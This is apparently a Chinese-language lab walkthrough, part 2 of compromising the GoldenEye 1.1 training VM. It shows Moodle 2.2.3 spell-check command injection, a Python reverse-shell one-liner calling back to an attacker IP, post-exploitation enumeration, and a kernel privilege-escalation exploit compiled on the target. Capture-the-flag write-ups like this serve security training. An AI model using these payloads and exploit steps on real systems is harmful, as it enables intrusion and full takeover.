Golden eye 1.1 part 2

我们现在已经登录到了管理员页面

 

用wappalyzer查看使用的是什么服务

 

LMS moodle

 

查询如何查看版本

https://www.isharkfly.com/t/moodle/4486

屏幕截图 2024-02-20 161220

 

Google查询 moodle 2.2.3 exploit

发现可以使用 exploit/multi/http/moodle_spelling_binary_rce

use exploit/multi/http/moodle_spelling_binary_rce

set password xWinter1995x!

set rhosts 192.168.192.164

exploit

发现不行

屏幕截图 2024-02-20 163333

尝试后放弃

 

手动注入试试

 

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.192.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

屏幕截图 2024-02-20 163548

 

Kali监听

 

写一篇文章 且要调用拼写检查

屏幕截图 2024-02-20 164105

发现不行

 

看一下漏洞页面 发现要改设置

屏幕截图 2024-02-20 165210

 

1610439028_5ffd5974dca2fbd1563ab

 

再次重复上述操作

 

就能getshell了

 

后渗透阶段

先建立稳定和交互式shell

 

查看网路信息

www-data@ubuntu:/home$ netstat -antlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:55006           0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:55007           0.0.0.0:*               LISTEN      -               
tcp        0      0 192.168.192.164:52261   192.168.192.128:4444    ESTABLISHED 1719/python     
tcp6       0      0 ::1:5432                :::*                    LISTEN      -               
tcp6       0      0 :::25                   :::*                    LISTEN      -               
tcp6       0      0 :::55006                :::*                    LISTEN      -               
tcp6       0      0 :::55007                :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 ::1:5432                ::1:47472               ESTABLISHED -               
tcp6       0      0 ::1:47472               ::1:5432                ESTABLISHED -               
tcp6       1      0 192.168.192.164:80      192.168.192.128:51216   CLOSE_WAIT  -

发现5432的端口

nc 127.0.0.1 5432

无果

 

查看版本和内核信息

www-data@ubuntu:/tmp$ uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/tmp$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

 

查找内核漏洞

searchsploit ubuntu 3.13.0

屏幕截图 2024-02-20 172800

拷贝到桌面 传给受害者

 

受害者编译运行

gcc 37292.c -o exploit

./exploit

告诉我们没有gcc

屏幕截图 2024-02-20 172908

查看有没有cc

www-data@ubuntu:/tmp$ which cc
/usr/bin/cc

有cc

 

在Kali中修改成cc

屏幕截图 2024-02-20 173042

光标处改成cc

 

再次传给受害者

受害者如上述运行 就能成功提权

屏幕截图 2024-02-20 173154

可以用python成交互式shell

 

实验结束

 

© 版权声明
THE END
喜欢就支持一下吧
点赞10 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片